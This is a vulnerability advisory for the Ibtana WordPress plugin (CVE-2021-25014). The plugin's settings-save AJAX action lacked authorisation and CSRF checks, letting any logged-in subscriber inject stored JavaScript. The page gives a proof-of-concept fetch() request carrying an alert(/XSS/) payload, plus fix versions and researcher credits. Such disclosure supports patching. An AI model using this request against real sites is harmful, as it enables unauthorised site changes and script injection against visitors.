Ibtana < 1.1.4.9 – Subscriber+ Settings Update to Stored XSS | CVE 2021-25014 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings which could lead to Stored Cross-Site Scripting issue.

Note: v1.1.4.7 added CSRF check, authorisation was added in 1.1.4.9

Proof of Concept

fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=ive_save_general_settings&ive_custom_js=alert(/XSS/)",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

The XSS will be triggered in all frontend pages in the Pro version

Affects Plugins

ibtana-visual-editor

Fixed in 1.1.4.9

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

63c58d7f-8e0b-4aa5-b3c8-8726b4f19bf1

Timeline

Publicly Published

2022-01-12 (about 4 years ago)

Added

2022-01-12 (about 4 years ago)

Last Updated

2022-04-16 (about 3 years ago)

Other

Published

Title

Published

2025-02-03

Title

OnePress <= 2.3.11 - Missing Authorization

Published

2025-04-01

Title

Ship Per Product <= 2.1.0 - Missing Authorization

Published

2023-11-16

Title

Conditional Fields for Contact Form 7 < 2.4.2 - Missing Authorization

Published

2025-01-06

Title

Hive Support – WordPress Help Desk < 1.1.7 - Missing Authorization

Published

2025-10-23

Title

Originality.ai AI Checker <= 1.0.16 - Missing Authorization to Authenticated (Subscriber+) Sensitive Information Disclosure via 'ai_get_table'